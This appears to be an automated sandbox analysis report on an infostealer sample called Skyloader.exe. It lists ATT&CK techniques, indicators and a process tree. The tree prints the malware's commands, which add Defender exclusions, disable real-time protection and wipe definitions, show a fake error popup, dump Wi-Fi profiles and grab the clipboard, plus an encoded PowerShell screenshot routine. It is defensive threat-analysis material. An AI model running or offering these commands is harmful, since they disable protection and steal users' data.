d962b1389af10329f10adc601df6df39c338fb9ebbe423de2ae75f68006e4637

Resubmissions

21-11-2024 18:54

241121-xkd3jsvmcs 10

19-11-2024 10:49

241119-mwxc6avjh1 10

Analysis

max time kernel
5s
max time network
5s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
21-11-2024 18:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Skyloader.exe
Size

7.4MB
MD5

9aafb39140717dcefd4c14204db1cf4f
SHA1

e9e4e7fb27ea230ae020fed1f2f7a448ceb9e055
SHA256

d962b1389af10329f10adc601df6df39c338fb9ebbe423de2ae75f68006e4637
SHA512

02f4f4279179704bb21becaed65667860f4595619ecf5e23f73686d5374fc260fd09552eeac2defecb624cb28bd120c9a7769f6643ba43870f308ae48f578302
SSDEEP

196608:0yYShEmTOshoKMuIkhVastRL5Di3uV1DV5:nYSyyOshouIkPftRL54u35

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1292	powershell.exe
4948	powershell.exe
1180	powershell.exe
3280	powershell.exe
4928	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Skyloader.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2924	cmd.exe
3068	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe
2248	Skyloader.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1532	tasklist.exe
3412	tasklist.exe
2288	tasklist.exe
4672	tasklist.exe
2968	tasklist.exe

UPX packed file 40 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab01-21.dat	upx
behavioral1/memory/2248-25-0x00007FF87A970000-0x00007FF87AF59000-memory.dmp	upx
behavioral1/files/0x001900000002aaec-27.dat	upx
behavioral1/files/0x001900000002aafd-29.dat	upx
behavioral1/memory/2248-30-0x00007FF88DB40000-0x00007FF88DB63000-memory.dmp	upx
behavioral1/files/0x001c00000002aaf6-47.dat	upx
behavioral1/files/0x001900000002aaf7-48.dat	upx
behavioral1/files/0x001900000002aaf5-46.dat	upx
behavioral1/memory/2248-45-0x00007FF895C50000-0x00007FF895C5F000-memory.dmp	upx
behavioral1/files/0x001900000002aaf2-44.dat	upx
behavioral1/files/0x001900000002aaf1-43.dat	upx
behavioral1/files/0x001c00000002aaf0-42.dat	upx
behavioral1/files/0x004600000002aaef-41.dat	upx
behavioral1/files/0x001a00000002aaeb-40.dat	upx
behavioral1/files/0x001c00000002ab08-39.dat	upx
behavioral1/files/0x001900000002ab07-38.dat	upx
behavioral1/files/0x001900000002ab04-37.dat	upx
behavioral1/files/0x001900000002aafe-34.dat	upx
behavioral1/files/0x001c00000002aafc-33.dat	upx
behavioral1/memory/2248-54-0x00007FF88C970000-0x00007FF88C99D000-memory.dmp	upx
behavioral1/memory/2248-56-0x00007FF892850000-0x00007FF892869000-memory.dmp	upx
behavioral1/memory/2248-58-0x00007FF88C420000-0x00007FF88C443000-memory.dmp	upx
behavioral1/memory/2248-60-0x00007FF87A250000-0x00007FF87A3C7000-memory.dmp	upx
behavioral1/memory/2248-62-0x00007FF892820000-0x00007FF892839000-memory.dmp	upx
behavioral1/memory/2248-64-0x00007FF895AB0000-0x00007FF895ABD000-memory.dmp	upx
behavioral1/memory/2248-66-0x00007FF88B780000-0x00007FF88B7B3000-memory.dmp	upx
behavioral1/memory/2248-71-0x00007FF88B6B0000-0x00007FF88B77D000-memory.dmp	upx
behavioral1/memory/2248-74-0x00007FF88DB40000-0x00007FF88DB63000-memory.dmp	upx
behavioral1/memory/2248-73-0x00007FF879D30000-0x00007FF87A250000-memory.dmp	upx
behavioral1/memory/2248-70-0x00007FF87A970000-0x00007FF87AF59000-memory.dmp	upx
behavioral1/memory/2248-76-0x00007FF88C400000-0x00007FF88C414000-memory.dmp	upx
behavioral1/memory/2248-79-0x00007FF88F870000-0x00007FF88F87D000-memory.dmp	upx
behavioral1/memory/2248-78-0x00007FF88C970000-0x00007FF88C99D000-memory.dmp	upx
behavioral1/memory/2248-81-0x00007FF879C10000-0x00007FF879D2C000-memory.dmp	upx
behavioral1/memory/2248-105-0x00007FF88C420000-0x00007FF88C443000-memory.dmp	upx
behavioral1/memory/2248-165-0x00007FF87A250000-0x00007FF87A3C7000-memory.dmp	upx
behavioral1/memory/2248-210-0x00007FF892820000-0x00007FF892839000-memory.dmp	upx
behavioral1/memory/2248-266-0x00007FF88B780000-0x00007FF88B7B3000-memory.dmp	upx
behavioral1/memory/2248-281-0x00007FF88B6B0000-0x00007FF88B77D000-memory.dmp	upx
behavioral1/memory/2248-284-0x00007FF879D30000-0x00007FF87A250000-memory.dmp	upx

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
568	cmd.exe
2116	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2600	WMIC.exe
1892	WMIC.exe
5112	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1480	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1180	powershell.exe
1292	powershell.exe
1180	powershell.exe
1292	powershell.exe
4948	powershell.exe
4948	powershell.exe
3068	powershell.exe
3068	powershell.exe
4576	powershell.exe
4576	powershell.exe
3068	powershell.exe
4576	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2968	tasklist.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeIncreaseQuotaPrivilege	4076	WMIC.exe
Token: SeSecurityPrivilege	4076	WMIC.exe
Token: SeTakeOwnershipPrivilege	4076	WMIC.exe
Token: SeLoadDriverPrivilege	4076	WMIC.exe
Token: SeSystemProfilePrivilege	4076	WMIC.exe
Token: SeSystemtimePrivilege	4076	WMIC.exe
Token: SeProfSingleProcessPrivilege	4076	WMIC.exe
Token: SeIncBasePriorityPrivilege	4076	WMIC.exe
Token: SeCreatePagefilePrivilege	4076	WMIC.exe
Token: SeBackupPrivilege	4076	WMIC.exe
Token: SeRestorePrivilege	4076	WMIC.exe
Token: SeShutdownPrivilege	4076	WMIC.exe
Token: SeDebugPrivilege	4076	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4076	WMIC.exe
Token: SeRemoteShutdownPrivilege	4076	WMIC.exe
Token: SeUndockPrivilege	4076	WMIC.exe
Token: SeManageVolumePrivilege	4076	WMIC.exe
Token: 33	4076	WMIC.exe
Token: 34	4076	WMIC.exe
Token: 35	4076	WMIC.exe
Token: 36	4076	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4076	WMIC.exe
Token: SeSecurityPrivilege	4076	WMIC.exe
Token: SeTakeOwnershipPrivilege	4076	WMIC.exe
Token: SeLoadDriverPrivilege	4076	WMIC.exe
Token: SeSystemProfilePrivilege	4076	WMIC.exe
Token: SeSystemtimePrivilege	4076	WMIC.exe
Token: SeProfSingleProcessPrivilege	4076	WMIC.exe
Token: SeIncBasePriorityPrivilege	4076	WMIC.exe
Token: SeCreatePagefilePrivilege	4076	WMIC.exe
Token: SeBackupPrivilege	4076	WMIC.exe
Token: SeRestorePrivilege	4076	WMIC.exe
Token: SeShutdownPrivilege	4076	WMIC.exe
Token: SeDebugPrivilege	4076	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4076	WMIC.exe
Token: SeRemoteShutdownPrivilege	4076	WMIC.exe
Token: SeUndockPrivilege	4076	WMIC.exe
Token: SeManageVolumePrivilege	4076	WMIC.exe
Token: 33	4076	WMIC.exe
Token: 34	4076	WMIC.exe
Token: 35	4076	WMIC.exe
Token: 36	4076	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2600	WMIC.exe
Token: SeSecurityPrivilege	2600	WMIC.exe
Token: SeTakeOwnershipPrivilege	2600	WMIC.exe
Token: SeLoadDriverPrivilege	2600	WMIC.exe
Token: SeSystemProfilePrivilege	2600	WMIC.exe
Token: SeSystemtimePrivilege	2600	WMIC.exe
Token: SeProfSingleProcessPrivilege	2600	WMIC.exe
Token: SeIncBasePriorityPrivilege	2600	WMIC.exe
Token: SeCreatePagefilePrivilege	2600	WMIC.exe
Token: SeBackupPrivilege	2600	WMIC.exe
Token: SeRestorePrivilege	2600	WMIC.exe
Token: SeShutdownPrivilege	2600	WMIC.exe
Token: SeDebugPrivilege	2600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2600	WMIC.exe
Token: SeRemoteShutdownPrivilege	2600	WMIC.exe
Token: SeUndockPrivilege	2600	WMIC.exe
Token: SeManageVolumePrivilege	2600	WMIC.exe
Token: 33	2600	WMIC.exe
Token: 34	2600	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1596 wrote to memory of 2248	1596	Skyloader.exe	79
PID 1596 wrote to memory of 2248	1596	Skyloader.exe	79
PID 2248 wrote to memory of 1980	2248	Skyloader.exe	81
PID 2248 wrote to memory of 1980	2248	Skyloader.exe	81
PID 2248 wrote to memory of 1196	2248	Skyloader.exe	82
PID 2248 wrote to memory of 1196	2248	Skyloader.exe	82
PID 2248 wrote to memory of 740	2248	Skyloader.exe	83
PID 2248 wrote to memory of 740	2248	Skyloader.exe	83
PID 2248 wrote to memory of 4920	2248	Skyloader.exe	87
PID 2248 wrote to memory of 4920	2248	Skyloader.exe	87
PID 2248 wrote to memory of 1872	2248	Skyloader.exe	89
PID 2248 wrote to memory of 1872	2248	Skyloader.exe	89
PID 1196 wrote to memory of 1180	1196	cmd.exe	91
PID 1196 wrote to memory of 1180	1196	cmd.exe	91
PID 4920 wrote to memory of 2968	4920	cmd.exe	92
PID 4920 wrote to memory of 2968	4920	cmd.exe	92
PID 1980 wrote to memory of 1292	1980	cmd.exe	93
PID 1980 wrote to memory of 1292	1980	cmd.exe	93
PID 740 wrote to memory of 3172	740	cmd.exe	94
PID 740 wrote to memory of 3172	740	cmd.exe	94
PID 1872 wrote to memory of 4076	1872	cmd.exe	95
PID 1872 wrote to memory of 4076	1872	cmd.exe	95
PID 2248 wrote to memory of 2288	2248	Skyloader.exe	137
PID 2248 wrote to memory of 2288	2248	Skyloader.exe	137
PID 2288 wrote to memory of 4648	2288	cmd.exe	99
PID 2288 wrote to memory of 4648	2288	cmd.exe	99
PID 2248 wrote to memory of 748	2248	Skyloader.exe	100
PID 2248 wrote to memory of 748	2248	Skyloader.exe	100
PID 748 wrote to memory of 4576	748	cmd.exe	139
PID 748 wrote to memory of 4576	748	cmd.exe	139
PID 2248 wrote to memory of 1312	2248	Skyloader.exe	163
PID 2248 wrote to memory of 1312	2248	Skyloader.exe	163
PID 1312 wrote to memory of 2600	1312	cmd.exe	105
PID 1312 wrote to memory of 2600	1312	cmd.exe	105
PID 2248 wrote to memory of 1248	2248	Skyloader.exe	106
PID 2248 wrote to memory of 1248	2248	Skyloader.exe	106
PID 1248 wrote to memory of 1892	1248	cmd.exe	108
PID 1248 wrote to memory of 1892	1248	cmd.exe	108
PID 2248 wrote to memory of 1052	2248	Skyloader.exe	109
PID 2248 wrote to memory of 1052	2248	Skyloader.exe	109
PID 1052 wrote to memory of 4948	1052	cmd.exe	111
PID 1052 wrote to memory of 4948	1052	cmd.exe	111
PID 2248 wrote to memory of 4768	2248	Skyloader.exe	112
PID 2248 wrote to memory of 4768	2248	Skyloader.exe	112
PID 2248 wrote to memory of 4836	2248	Skyloader.exe	113
PID 2248 wrote to memory of 4836	2248	Skyloader.exe	113
PID 2248 wrote to memory of 952	2248	Skyloader.exe	116
PID 2248 wrote to memory of 952	2248	Skyloader.exe	116
PID 4836 wrote to memory of 1532	4836	cmd.exe	118
PID 4836 wrote to memory of 1532	4836	cmd.exe	118
PID 2248 wrote to memory of 2924	2248	Skyloader.exe	119
PID 2248 wrote to memory of 2924	2248	Skyloader.exe	119
PID 2248 wrote to memory of 4172	2248	Skyloader.exe	120
PID 2248 wrote to memory of 4172	2248	Skyloader.exe	120
PID 4768 wrote to memory of 3412	4768	cmd.exe	122
PID 4768 wrote to memory of 3412	4768	cmd.exe	122
PID 2248 wrote to memory of 3516	2248	Skyloader.exe	124
PID 2248 wrote to memory of 3516	2248	Skyloader.exe	124
PID 952 wrote to memory of 2664	952	cmd.exe	126
PID 952 wrote to memory of 2664	952	cmd.exe	126
PID 2248 wrote to memory of 568	2248	Skyloader.exe	127
PID 2248 wrote to memory of 568	2248	Skyloader.exe	127
PID 2248 wrote to memory of 4784	2248	Skyloader.exe	128
PID 2248 wrote to memory of 4784	2248	Skyloader.exe	128

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2220	attrib.exe
1884	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Skyloader.exe
"C:\Users\Admin\AppData\Local\Temp\Skyloader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1596
- C:\Users\Admin\AppData\Local\Temp\Skyloader.exe
  "C:\Users\Admin\AppData\Local\Temp\Skyloader.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Skyloader.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Skyloader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn´t Open this file please reinstall', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:740
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldn´t Open this file please reinstall', 0, 'Error', 0+16);close()"
      4⤵
      PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4920
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:748
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4768
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4836
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:952
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4172
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3516
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:568
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4784
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1756
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbg